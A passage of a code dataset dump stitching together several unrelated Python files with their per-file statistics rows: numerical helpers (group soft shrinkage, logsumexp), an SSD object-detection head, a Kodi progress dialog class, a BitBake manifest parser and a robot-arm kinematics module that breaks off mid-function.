(by parallizing loops, efficient storage access).
"""
shrinkednorm = 0
# if glims is None:
n_groups = len(glims) - 1
if glims[-1] == n_groups: # each group has size 1
tmp = np.abs(mat)
if not weights is None: # weighted l1-norm
# tmp = np.multiply(tmp, weights).flatten
tmp -= tau * weights
else:
tmp -= tau
tmp[tmp < 1e-25] = 0
shrinked = np.multiply(np.sign(mat), tmp)
l1norm = np.sum(np.abs(shrinked.flatten()))
if off:
l1norm -= np.sum(np.abs(np.diag(shrinked)))
shrinked -= np.diag(np.diag(shrinked))
shrinked += np.diag(np.diag(mat))
return shrinked, l1norm
# group soft shrink
if weights is None:
weights = np.ones(mat.shape) # TODO(franknu): improve style
tmp = np.empty(mat.shape)
for i in range(n_groups):
for j in range(n_groups):
# TODO(franknu): use symmetry
group = mat[glims[i]:glims[i + 1], glims[j]:glims[j + 1]]
if (i == j) and off:
tmp[glims[i]:glims[i + 1], glims[i]:glims[i + 1]] = group
continue
gnorm = np.linalg.norm(group, 'fro')
w_ij = tau * weights[i,j]
if gnorm <= w_ij:
tmp[glims[i]:glims[i + 1],
glims[j]:glims[j + 1]] = np.zeros(group.shape)
else:
tmp[glims[i]:glims[i+1], glims[j]:glims[j+1]] = \
group * (1 - w_ij / gnorm)
shrinkednorm += weights[i,j] * (1 - w_ij / gnorm) * gnorm
return tmp, shrinkednorm
def l21norm(mat, glims=None, off=False, weights=None):
"""
calculate l_{1,2}-norm.
Args:
mat (np.array): matrix.
off (bool): if True, do not shrink diagonal entries.
glims: group delimiters (cumulative sizes of groups).
n_groups: # groups per row/column (if this is given,
perform group soft shrink instead of soft shrink).
weights (optional): weights for weighted l_{1,2} norm.
Returns:
float: (group) l_{1,2}-norm.
"""
if glims is None:
# calculate regular l1-norm
tmp = np.abs(mat) # tmp is copy, can do this inplace by specifying out
if not weights is None: # weighted l1-norm
tmp = np.multiply(tmp, weights).flatten
tmp = np.sum(tmp)
if off:
tmp -= np.sum(np.diag(np.abs(mat)))
return tmp
n_groups = len(glims) - 1
l21sum = 0
if weights is None:
for i in range(n_groups):
for j in range(i):
group = mat[glims[i]:glims[i + 1], glims[j]:glims[j + 1]]
l21sum += np.linalg.norm(group, 'fro')
else:
for i in range(n_groups):
for j in range(i):
group = mat[glims[i]:glims[i + 1], glims[j]:glims[j + 1]]
l21sum += weights[i,j] * np.linalg.norm(group, 'fro')
l21sum *= 2 # use symmetry
if not off:
for i in range(n_groups):
group = mat[glims[i]:glims[i + 1], glims[i]:glims[i + 1]]
l21sum += np.linalg.norm(group, 'fro')
return l21sum
###############################################################################
# stable implementation of logsumexp etc.
###############################################################################
#from scipy.special import logsumexp
def _exp_shiftedmax(array, axis=None):
"""calculate exponentials of array shifted by its max, avoiding overflow
by subtracting maximum before"""
a_max = np.amax(array, axis=axis, keepdims=True)
if a_max.ndim > 0:
a_max[~np.isfinite(a_max)] = 0
elif not np.isfinite(a_max):
a_max = 0
# print((a-a_max).shape)
exp_shiftedamax = np.exp(array - a_max)
# last line: a_max is repeated columnwise (if axis = 1)
return exp_shiftedamax, a_max
def logsumexp(array, axis=None, keepdims=True):
"""Compute the log of the sum of exponentials of input elements.
Args:
array (np.array): array on which to compute logsumexp.
axis (int): axis along which to compute logsupexp.
keepdims (bool): passed to np.sum.
Returns:
np.array: logsumexp
Note:
This is an adaptation of logsumexp in scipy.special (v1.1.0)
"""
exp_shifted, a_max = _exp_shiftedmax(array, axis=axis)
# suppress warnings about log of zero
with np.errstate(divide='ignore'):
summed = np.sum(exp_shifted, axis=axis, keepdims=keepdims)
out = np.log(summed)
if not keepdims:
a_max = np.squeeze(a_max, axis=axis)
out += a_max
return out
def _logsumexp_and_conditionalprobs(array):
"""return logsumexp and conditional probabilities from array a
that has the same shape as the discrete data in dummy-representation"""
exp_shifted, a_max = _exp_shiftedmax(array, axis=1)
summed = np.sum(exp_shifted, axis=1, keepdims=True) # entries always > 1
# suppress warnings about log of zero
with np.errstate(divide='ignore'):
out_logsumexp = np.log(summed)
out_logsumexp += a_max
# node conditional probabilities
size = array.shape[1]
out_conditionalprobs = np.divide(exp_shifted,
np.dot(summed, np.ones((1, size))))
# unstable = np.log(np.sum(np.exp(a), axis = 1)).reshape((a.shape[0], 1))
# diff = unstable - out_logsumexp
# print (unstable)
# for i in range(unstable.shape[0]):
# if abs(diff[i, 0]) > 10e-5:
# print('a', a[i, :])
# print('unstable', unstable[i, 0])
# print('stable', out_logsumexp[i, 0])
# break
# assert np.linalg.norm(unstable - out_logsumexp) < 10E-5
# print(out_logsumexp)
# print(out_logsumexp[:1, 0])
# assert 1 == 0
out_logsumexp = np.squeeze(out_logsumexp)
return out_logsumexp, out_conditionalprobs
def _logsumexp_condprobs_red(array):
"""normalization and conditional probabilities for reduced levels,
a ... two-dimensional array"""
a_max = np.amax(array, axis=1, keepdims=True)
a_max = np.maximum(a_max, 0)
# last line: account for missing column with probs exp(0) for 0th level
if a_max.ndim > 0:
a_max[~np.isfinite(a_max)] = 0
elif not np.isfinite(a_max):
a_max = 0
exp_shifted = np.exp(array - a_max) # a_max is repeated columnwise (axis=1)
# calc column vector s of (shifted) normalization sums
# note that entries always > 1, since one summand in each col is exp(0)
summed = np.sum(exp_shifted, axis=1, keepdims=True)
summed += np.exp(-a_max) # add values from missing 0th column
# suppress warnings about log of zero
with np.errstate(divide='ignore'):
out_logsumexp = np.log(summed)
out_logsumexp += a_max
out_logsumexp = np.squeeze(out_logsumexp)
# node conditional probabilities, required for gradient
size = array.shape[1]
out_conditionalprobs = np.divide(exp_shifted,
np.dot(summed, np.ones((1, size))))
# note: log of this is not stable if probabilities close to zero
# - use logsumexp instead for calculating plh value
return out_logsumexp, out_conditionalprobs
###############################################################################
# some conversion functions for representations of discrete data
###############################################################################
def dummy_to_index_single(dummy_x, sizes):
"""convert dummy to index representation"""
offset = 0
ind = np.empty(len(sizes), dtype=np.int)
for i, size_r in enumerate(sizes):
for j in range(size_r):
if dummy_x[offset + j] == 1:
ind[i] = j
break
offset += size_r
return ind
def dummy_to_index(dummy_data, sizes):
"""convert dummy to index representation"""
n_data, ltot = dummy_data.shape
assert ltot == sum(sizes)
n_cat = len(sizes)
index_data = np.empty((n_data, n_cat), dtype=np.int)
for k in range(n_data):
offset = 0
for i, size_r in enumerate(sizes):
for j in range(size_r):
if dummy_data[offset + j] == 1:
index_data[k, i] = j
break
offset += size_r
return index_data
#def dummypadded_to_unpadded(dummy_data, n_cat):
# """remove convert dummy to index representation"""
# unpadded = np.empty(n_cat)
# for i,x in enumerate(dummy_data):
# if i % 2 == 1:
# unpadded[i // 2] = x
# return unpadded
def index_to_dummy(idx, glims, ltot):
"""convert index to dummy representation"""
dummy_data = np.zeros(ltot)
for i, ind in enumerate(idx):
dummy_data[glims[i] + ind] = 1
return dummy_data
def dummy2dummyred(dummy_data, glims):
"""convert dummy to reduced dummy representation"""
return np.delete(dummy_data, glims[:-1], 1)
###############################################################################
# testing utilities
###############################################################################
def strlistfrom(array, rnd=2):
"""a convenient representation for printing out numpy array
s.t. it can be reused as a list"""
string = np.array2string(array, precision=rnd, separator=',')
string = 'np.array(' + string.translate({ord(c): None for c in '\n '}) + ')'
return string
def tomatlabmatrix(mat):
"""print numpy matrix in a way that can be pasted into MATLAB code."""
nrows, ncols = mat.shape
string = "["
for i in range(nrows):
string += "["
for j in range(ncols):
string += str(mat[i, j]) + " "
string += "];"
string = string[:-1] + "]"
print(string)
def frange(start, stop, step):
"""a float range function"""
i = start
while i < stop:
yield i
i += step
if __name__ == '__main__':
SIZES = [2, 2, 2]
GLIMS = [0, 2, 4, 6]
LTOT = 6
IND = [0, 0, 1]
DUMMY = index_to_dummy(IND, GLIMS, LTOT)
IND2 = dummy_to_index_single(DUMMY, SIZES)
MAT = np.arange(6).reshape((3, 2))
RES = _logsumexp_condprobs_red(MAT)
print(RES)
# res should be
# (array([ 1.55144471, 3.34901222, 5.31817543]), array([[ 0.21194156, 0.57611688],
# [ 0.25949646, 0.70538451],
# [ 0.26762315, 0.72747516]]))
| 33.752551
| 90
| 0.542438
| 1,645
| 13,231
| 4.26383
| 0.210942
| 0.015968
| 0.014115
| 0.015398
| 0.359139
| 0.294554
| 0.258055
| 0.244226
| 0.223981
| 0.201739
| 0
| 0.023121
| 0.307006
| 13,231
| 391
| 91
| 33.838875
| 0.741848
| 0.340791
| 0
| 0.331522
| 0
| 0
| 0.030249
| 0
| 0
| 0
| 0
| 0.005115
| 0.005435
| 1
| 0.076087
| false
| 0
| 0.027174
| 0
| 0.179348
| 0.027174
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e428e1c353f9ae16acebfc45bfab7a9a4bd2704
| 2,081
|
py
|
Python
|
ssd/modeling/head/ssd_head.py
|
tkhe/ssd-family
|
a797ec36fda59549aff54419c105813c33d8cdd3
|
[
"MIT"
] | 1
|
2019-07-12T02:21:24.000Z
|
2019-07-12T02:21:24.000Z
|
ssd/modeling/head/ssd_head.py
|
tkhe/ssd-family
|
a797ec36fda59549aff54419c105813c33d8cdd3
|
[
"MIT"
] | null | null | null |
ssd/modeling/head/ssd_head.py
|
tkhe/ssd-family
|
a797ec36fda59549aff54419c105813c33d8cdd3
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch.nn.functional as F
from ssd.modeling.anchor import make_anchor_generator
from ssd.utils import bbox
from .inference import make_post_processor
from .loss import make_loss_evaluator
from .predictor import make_ssd_predictor
class SSDHead(nn.Module):
def __init__(self, cfg, in_channels):
super(SSDHead, self).__init__()
num_classes = cfg.MODEL.NUM_CLASSES
anchors_per_location = [
len(aspect_ratio) * 2 + 2
for aspect_ratio in cfg.MODEL.ANCHOR.ASPECT_RATIOS
]
self.predictor = make_ssd_predictor(cfg, in_channels, anchors_per_location, num_classes)
self.loss_evaluator = make_loss_evaluator(cfg)
self.post_processor = make_post_processor(cfg)
self.anchor_generator = make_anchor_generator(cfg)
self.center_variance = cfg.MODEL.CENTER_VARIANCE
self.size_variance = cfg.MODEL.SIZE_VARIANCE
self.size = cfg.INPUT.SIZE
def forward(self, features, targets=None):
cls_logits, bbox_pred = self.predictor(features)
if self.training:
return self._forward_train(cls_logits, bbox_pred, targets)
else:
return self._forward_test(cls_logits, bbox_pred)
def _forward_train(self, cls_logits, bbox_pred, targets):
gt_boxes, gt_labels = targets[0], targets[1]
cls_loss, reg_loss = self.loss_evaluator(cls_logits, bbox_pred, gt_labels, gt_boxes)
loss_dict = dict(
cls_loss=cls_loss,
reg_loss=reg_loss,
)
return {}, loss_dict
def _forward_test(self, cls_logits, bbox_pred):
anchors = self.anchor_generator.generate_anchors()
anchors = anchors.to(cls_logits.device)
scores = F.softmax(cls_logits, dim=2)
boxes = bbox.convert_locations_to_boxes(
bbox_pred,
anchors,
self.center_variance,
self.size_variance
)
boxes = bbox.xywh2xyxy(boxes)
detections = self.post_processor(boxes, scores)
return detections, {}
| 35.87931
| 96
| 0.675156
| 266
| 2,081
| 4.954887
| 0.285714
| 0.054628
| 0.059181
| 0.07739
| 0.10091
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003824
| 0.246036
| 2,081
| 57
| 97
| 36.508772
| 0.836201
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081633
| false
| 0
| 0.142857
| 0
| 0.326531
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e42bcb647690572f850059e2f35498edac0af13
| 415
|
py
|
Python
|
find_max_occurence_simple.py
|
swatmantis/my-pyscripts
|
e16af5879b101c30e34e82727292849d1d33f440
|
[
"Apache-2.0"
] | null | null | null |
find_max_occurence_simple.py
|
swatmantis/my-pyscripts
|
e16af5879b101c30e34e82727292849d1d33f440
|
[
"Apache-2.0"
] | null | null | null |
find_max_occurence_simple.py
|
swatmantis/my-pyscripts
|
e16af5879b101c30e34e82727292849d1d33f440
|
[
"Apache-2.0"
] | null | null | null |
"""Find max element"""
#!/usr/bin/env python3
"""Find max element"""
import random
from collections import Counter
List = [random.randrange(1, 15) for num in range(10)]
def most_frequent(List):
occurence_count = Counter(List)
return occurence_count.most_common()
frequent_number, frequency = most_frequent(List)[0]
print(f"List {List}: \nMost frequent number {frequent_number} \nFrequency: {frequency}")
| 27.666667
| 88
| 0.742169
| 57
| 415
| 5.280702
| 0.614035
| 0.139535
| 0.093023
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019284
| 0.125301
| 415
| 14
| 89
| 29.642857
| 0.809917
| 0.091566
| 0
| 0
| 0
| 0
| 0.223496
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.25
| 0
| 0.5
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e4b385ebb874ffc51cb3af951c49e948dbf2c97
| 1,659
|
py
|
Python
|
plugin.video.SportsDevil/lib/dialogs/dialogProgress.py
|
akuala/REPO.KUALA
|
ea9a157025530d2ce8fa0d88431c46c5352e89d4
|
[
"Apache-2.0"
] | 105
|
2015-11-28T00:03:11.000Z
|
2021-05-05T20:47:42.000Z
|
plugin.video.SportsDevil/lib/dialogs/dialogProgress.py
|
akuala/REPO.KUALA
|
ea9a157025530d2ce8fa0d88431c46c5352e89d4
|
[
"Apache-2.0"
] | 918
|
2015-11-28T14:12:40.000Z
|
2022-03-23T20:24:49.000Z
|
plugin.video.SportsDevil/lib/dialogs/dialogProgress.py
|
akuala/REPO.KUALA
|
ea9a157025530d2ce8fa0d88431c46c5352e89d4
|
[
"Apache-2.0"
] | 111
|
2015-12-01T14:06:10.000Z
|
2020-08-01T10:44:39.000Z
|
# -*- coding: utf-8 -*-
import xbmcgui
class DialogProgress:
def __init__(self):
self.dlg = xbmcgui.DialogProgress()
self.__reset__()
def __reset__(self):
self.head = ''
self.firstline = ''
self.secondline = None
self.thirdline = None
self.percent = 0
def isCanceled(self):
return self.dlg.iscanceled()
def update(self, percent=None, firstline=None, secondline=None, thirdline=None):
if firstline:
self.firstline = firstline
if secondline:
self.secondline = secondline
if thirdline:
self.thirdline = thirdline
if percent:
self.percent = percent
if self.secondline and self.thirdline:
self.dlg.update(self.percent, self.firstline, self.secondline, self.thirdline)
elif self.secondline:
self.dlg.update(self.percent, self.firstline, self.secondline)
else:
self.dlg.update(self.percent, self.firstline)
def create(self, head, firstline = None, secondline=None, thirdline=None):
if firstline:
self.firstline = firstline
if secondline:
self.secondline = secondline
if thirdline:
self.thirdline = thirdline
if self.secondline and self.thirdline:
self.dlg.create(head, self.firstline, self.secondline, self.thirdline)
elif self.secondline:
self.dlg.create(head, self.firstline, self.secondline)
else:
self.dlg.create(head, self.firstline)
def close(self):
self.dlg.close()
self.__reset__()
| 28.603448
| 90
| 0.603978
| 174
| 1,659
| 5.666667
| 0.16092
| 0.156187
| 0.086207
| 0.136917
| 0.718053
| 0.686613
| 0.663286
| 0.610548
| 0.492901
| 0.423935
| 0
| 0.001721
| 0.299578
| 1,659
| 58
| 91
| 28.603448
| 0.846816
| 0.012658
| 0
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.136364
| false
| 0
| 0.022727
| 0.022727
| 0.204545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e4b7d98eca7eba2d20b079df0bbd0eb0b4e7a32
| 3,828
|
py
|
Python
|
bitbake/lib/bb/manifest.py
|
KDAB/OpenEmbedded-Archos
|
a525c5629a57ccb8656c22fe5528ce264003f9d8
|
[
"MIT"
] | 3
|
2015-05-25T10:56:21.000Z
|
2021-11-27T17:25:26.000Z
|
bitbake/lib/bb/manifest.py
|
KDAB/OpenEmbedded-Archos
|
a525c5629a57ccb8656c22fe5528ce264003f9d8
|
[
"MIT"
] | 1
|
2021-11-27T17:24:21.000Z
|
2021-11-27T17:24:21.000Z
|
bitbake/lib/bb/manifest.py
|
KDAB/OpenEmbedded-Archos
|
a525c5629a57ccb8656c22fe5528ce264003f9d8
|
[
"MIT"
] | 2
|
2016-08-13T08:40:48.000Z
|
2021-03-26T03:01:03.000Z
|
# ex:ts=4:sw=4:sts=4:et
# -*- tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*-
#
# Copyright (C) 2003, 2004 Chris Larson
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import os, sys
import bb, bb.data
def getfields(line):
fields = {}
fieldmap = ( "pkg", "src", "dest", "type", "mode", "uid", "gid", "major", "minor", "start", "inc", "count" )
for f in xrange(len(fieldmap)):
fields[fieldmap[f]] = None
if not line:
return None
splitline = line.split()
if not len(splitline):
return None
try:
for f in xrange(len(fieldmap)):
if splitline[f] == '-':
continue
fields[fieldmap[f]] = splitline[f]
except IndexError:
pass
return fields
def parse (mfile, d):
manifest = []
while 1:
line = mfile.readline()
if not line:
break
if line.startswith("#"):
continue
fields = getfields(line)
if not fields:
continue
manifest.append(fields)
return manifest
def emit (func, manifest, d):
#str = "%s () {\n" % func
str = ""
for line in manifest:
emittedline = emit_line(func, line, d)
if not emittedline:
continue
str += emittedline + "\n"
# str += "}\n"
return str
def mangle (func, line, d):
import copy
newline = copy.copy(line)
src = bb.data.expand(newline["src"], d)
if src:
if not os.path.isabs(src):
src = "${WORKDIR}/" + src
dest = newline["dest"]
if not dest:
return
if dest.startswith("/"):
dest = dest[1:]
if func is "do_install":
dest = "${D}/" + dest
elif func is "do_populate":
dest = "${WORKDIR}/install/" + newline["pkg"] + "/" + dest
elif func is "do_stage":
varmap = {}
varmap["${bindir}"] = "${STAGING_DIR}/${HOST_SYS}/bin"
varmap["${libdir}"] = "${STAGING_DIR}/${HOST_SYS}/lib"
varmap["${includedir}"] = "${STAGING_DIR}/${HOST_SYS}/include"
varmap["${datadir}"] = "${STAGING_DATADIR}"
matched = 0
for key in varmap.keys():
if dest.startswith(key):
dest = varmap[key] + "/" + dest[len(key):]
matched = 1
if not matched:
newline = None
return
else:
newline = None
return
newline["src"] = src
newline["dest"] = dest
return newline
def emit_line (func, line, d):
import copy
newline = copy.deepcopy(line)
newline = mangle(func, newline, d)
if not newline:
return None
str = ""
type = newline["type"]
mode = newline["mode"]
src = newline["src"]
dest = newline["dest"]
if type is "d":
str = "install -d "
if mode:
str += "-m %s " % mode
str += dest
elif type is "f":
if not src:
return None
if dest.endswith("/"):
str = "install -d "
str += dest + "\n"
str += "install "
else:
str = "install -D "
if mode:
str += "-m %s " % mode
str += src + " " + dest
del newline
return str
| 26.4
| 112
| 0.544148
| 475
| 3,828
| 4.36
| 0.353684
| 0.026557
| 0.018831
| 0.027523
| 0.16562
| 0.106229
| 0.056977
| 0.028006
| 0.028006
| 0.028006
| 0
| 0.011214
| 0.324451
| 3,828
| 144
| 113
| 26.583333
| 0.789637
| 0.204545
| 0
| 0.308411
| 0
| 0
| 0.119669
| 0.031074
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046729
| false
| 0.009346
| 0.037383
| 0
| 0.196262
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e4e48bf1020755d5adf17a1c4aa85cf738609d6
| 23,209
|
py
|
Python
|
riglib/bmi/robot_arms.py
|
sgowda/brain-python-interface
|
708e2a5229d0496a8ce9de32bda66f0925d366d9
|
[
"Apache-2.0"
] | 7
|
2015-08-25T00:28:49.000Z
|
2020-04-14T22:58:51.000Z
|
riglib/bmi/robot_arms.py
|
sgowda/brain-python-interface
|
708e2a5229d0496a8ce9de32bda66f0925d366d9
|
[
"Apache-2.0"
] | 89
|
2020-08-03T16:54:08.000Z
|
2022-03-09T19:56:19.000Z
|
riglib/bmi/robot_arms.py
|
sgowda/brain-python-interface
|
708e2a5229d0496a8ce9de32bda66f0925d366d9
|
[
"Apache-2.0"
] | 4
|
2016-10-05T17:54:26.000Z
|
2020-08-06T15:37:09.000Z
|
'''
Classes implementing various kinematic chains. This module is perhaps mis-located
as it does not have a direct BMI role but rather contains code which is useful in
supporting BMI control of kinematic chains.
This code depends on the 'robot' module (https://github.com/sgowda/robotics_toolbox)
'''
import numpy as np
try:
import robot
except ImportError:
import warnings
warnings.warn("The 'robot' module cannot be found! See https://github.com/sgowda/robotics_toolbox")
import matplotlib.pyplot as plt
from collections import OrderedDict
import time
pi = np.pi
class KinematicChain(object):
'''
Arbitrary kinematic chain (i.e. spherical joint at the beginning of
each joint)
'''
def __init__(self, link_lengths=[10., 10.], name='', base_loc=np.array([0., 0., 0.]), rotation_convention=1):
'''
Docstring
Parameters
----------
link_lengths: iterable
Lengths of all the distances between joints
base_loc: np.array of shape (3,), default=np.array([0, 0, 0])
Location of the base of the kinematic chain in an "absolute" reference frame
'''
self.n_links = len(link_lengths)
self.link_lengths = link_lengths
self.base_loc = base_loc
assert rotation_convention in [-1, 1]
self.rotation_convention = rotation_convention
# Create the robot object. Override for child classes with different types of joints
self._init_serial_link()
self.robot.name = name
def _init_serial_link(self):
links = []
for link_length in self.link_lengths:
link1 = robot.Link(alpha=-pi/2)
link2 = robot.Link(alpha=pi/2)
link3 = robot.Link(d=-link_length)
links += [link1, link2, link3]
# By convention, we start the arm in the XY-plane
links[1].offset = -pi/2
self.robot = robot.SerialLink(links)
def calc_full_joint_angles(self, joint_angles):
'''
Override in child classes to perform static transforms on joint angle inputs. If some
joints are always static (e.g., if the chain only operates in a plane)
this can avoid unclutter joint angle specifications.
'''
return self.rotation_convention * joint_angles
def full_angles_to_subset(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
return joint_angles
def plot(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
joint_angles = self.calc_full_joint_angles(joint_angles)
self.robot.plot(joint_angles)
def forward_kinematics(self, joint_angles, **kwargs):
'''
Calculate forward kinematics using D-H parameter convention
Parameters
----------
Returns
-------
'''
joint_angles = self.calc_full_joint_angles(joint_angles)
t, allt = self.robot.fkine(joint_angles, **kwargs)
self.joint_angles = joint_angles
self.t = t
self.allt = allt
return t, allt
def apply_joint_limits(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
return joint_angles
def inverse_kinematics(self, target_pos, q_start=None, method='pso', **kwargs):
'''
Docstring
Parameters
----------
Returns
-------
'''
if q_start == None:
q_start = self.random_sample()
return self.inverse_kinematics_pso(target_pos, q_start, **kwargs)
# ik_method = getattr(self, 'inverse_kinematics_%s' % method)
# return ik_method(q_start, target_pos)
def inverse_kinematics_grad_descent(self, target_pos, starting_config, n_iter=1000, verbose=False, eps=0.01, return_path=False):
'''
Default inverse kinematics method is RRT since for redundant
kinematic chains, an infinite number of inverse kinematics solutions
exist
Docstring
Parameters
----------
Returns
-------
'''
q = starting_config
start_time = time.time()
endpoint_traj = np.zeros([n_iter, 3])
joint_limited = np.zeros(len(q))
for k in range(n_iter):
# print k
# calc endpoint position of the manipulator
endpoint_traj[k] = self.endpoint_pos(q)
current_cost = np.linalg.norm(endpoint_traj[k] - target_pos, 2)
if current_cost < eps:
print("Terminating early")
break
# calculate the jacobian
J = self.jacobian(q)
J_pos = J[0:3,:]
# for joints that are at their limit, zero out the jacobian?
# J_pos[:, np.nonzero(self.calc_full_joint_angles(joint_limited))] = 0
# take a step from the current position toward the target pos using the inverse Jacobian
J_inv = np.linalg.pinv(J_pos)
# J_inv = J_pos.T
xdot = (target_pos - endpoint_traj[k])#/np.linalg.norm(endpoint_traj[k] - target_pos)
# if current_cost < 3 or k > 10:
# stepsize = 0.001
# else:
# stepsize = 0.01
xdot = (target_pos - endpoint_traj[k])#/np.linalg.norm(endpoint_traj[k] - target_pos)
# xdot = (endpoint_traj[k] - target_pos)/np.linalg.norm(endpoint_traj[k] - target_pos)
qdot = 0.001*np.dot(J_inv, xdot)
qdot = self.full_angles_to_subset(np.array(qdot).ravel())
q += qdot
# apply joint limits
q, joint_limited = self.apply_joint_limits(q)
end_time = time.time()
runtime = end_time - start_time
if verbose:
print("Runtime: %g" % runtime)
print("# of iterations: %g" % k)
if return_path:
return q, endpoint_traj[:k]
else:
return q
def jacobian(self, joint_angles):
'''
Return the full jacobian
Docstring
Parameters
----------
Returns
-------
'''
joint_angles = self.calc_full_joint_angles(joint_angles)
J = self.robot.jacobn(joint_angles)
return J
def endpoint_pos(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
t, allt = self.forward_kinematics(joint_angles)
pos_rel_to_base = np.array(t[0:3,-1]).ravel()
return pos_rel_to_base + self.base_loc
def ik_cost(self, q, q_start, target_pos, weight=100):
'''
Docstring
Parameters
----------
Returns
-------
'''
q_diff = q - q_start
return np.linalg.norm(q_diff[0:2]) + weight*np.linalg.norm(self.endpoint_pos(q) - target_pos)
def inverse_kinematics_pso(self, target_pos, q_start, time_limit=np.inf, verbose=False, eps=0.5, n_particles=10, n_iter=10):
'''
Docstring
Parameters
----------
Returns
-------
'''
# Initialize the particles;
n_joints = self.n_joints
particles_q = np.tile(q_start, [n_particles, 1])
# if 0:
# # initialize the velocities to be biased around the direction the jacobian tells you is correct
# current_pos = self.endpoint_pos(q_start)
# int_displ = target_pos - current_pos
# print int_displ, target_pos
# J = self.jacobian(q_start)
# endpoint_vel = np.random.randn(n_particles, 3)# + int_displ
# particles_v = np.dot(J[0:3,1::3].T, endpoint_vel.T).T
# else:
# # initialize particle velocities randomly
particles_v = np.random.randn(n_particles, n_joints) #/ np.array([1., 1., 1, 1]) #np.array(self.link_lengths)
cost_fn = lambda q: self.ik_cost(q, q_start, target_pos)
gbest = particles_q.copy()
gbestcost = np.array(list(map(cost_fn, gbest)))
pbest = gbest[np.argmin(gbestcost)]
pbestcost = cost_fn(pbest)
min_limits = np.array([x[0] for x in self.joint_limits])
max_limits = np.array([x[1] for x in self.joint_limits])
min_limits = np.tile(min_limits, [n_particles, 1])
max_limits = np.tile(max_limits, [n_particles, 1])
start_time = time.time()
for k in range(n_iter):
if time.time() - start_time > time_limit:
break
# update positions of particles
particles_q += particles_v
# apply joint limits
min_viol = particles_q < min_limits
max_viol = particles_q > max_limits
particles_q[min_viol] = min_limits[min_viol]
particles_q[max_viol] = max_limits[max_viol]
# update the costs
costs = np.array(list(map(cost_fn, particles_q)))
# update the 'bests'
gbest[gbestcost > costs] = particles_q[gbestcost > costs]
gbestcost[gbestcost > costs] = costs[gbestcost > costs]
idx = np.argmin(gbestcost)
pbest = gbest[idx]
pbestcost = gbestcost[idx]
# update the velocity
phi1 = 1#np.random.rand()
phi2 = 1#np.random.rand()
w=0.25
c1=0.5
c2=0.25
particles_v = w*particles_v + c1*phi1*(pbest - particles_q) + c2*phi2*(gbest - particles_q)
error = np.linalg.norm(self.endpoint_pos(pbest) - target_pos)
if error < eps:
break
end_time = time.time()
if verbose: print("Runtime = %g, error = %g, n_iter=%d" % (end_time-start_time, error, k))
return pbest
def spatial_positions_of_joints(self, joint_angles):
'''
Docstring
Parameters
----------
Returns
-------
'''
_, allt = self.forward_kinematics(joint_angles, return_allt=True)
pos = (allt[0:3, -1,:].T + self.base_loc).T
# pos = np.hstack([np.zeros([3,1]), pos])
return pos
class PlanarXZKinematicChain(KinematicChain):
'''
Kinematic chain restricted to movement in the XZ-plane
'''
def _init_serial_link(self):
base = robot.Link(alpha=pi/2, d=0, a=0)
links = [base]
for link_length in self.link_lengths:
link1 = robot.Link(alpha=0, d=0, a=link_length)
links.append(link1)
# link2 = robot.Link(alpha=pi/2)
# link3 = robot.Link(d=-link_length)
# links += [link1, link2, link3]
# By convention, we start the arm in the XY-plane
# links[1].offset = -pi/2
self.robot = robot.SerialLink(links)
def calc_full_joint_angles(self, joint_angles):
'''
only some joints rotate in the planar kinematic chain
Parameters
----------
joint_angles : np.ndarray of shape (self.n_links)
Joint angles without the angle for the base link, which is fixed at 0
Returns
-------
joint_angles_full : np.ndarray of shape (self.n_links+1)
Add on the 0 at the proximal end for the base link angle
'''
if not len(joint_angles) == self.n_links:
raise ValueError("Incorrect number of joint angles specified!")
# # There are really 3 angles per joint to allow 3D rotation at each joint
# joint_angles_full = np.zeros(self.n_links * 3)
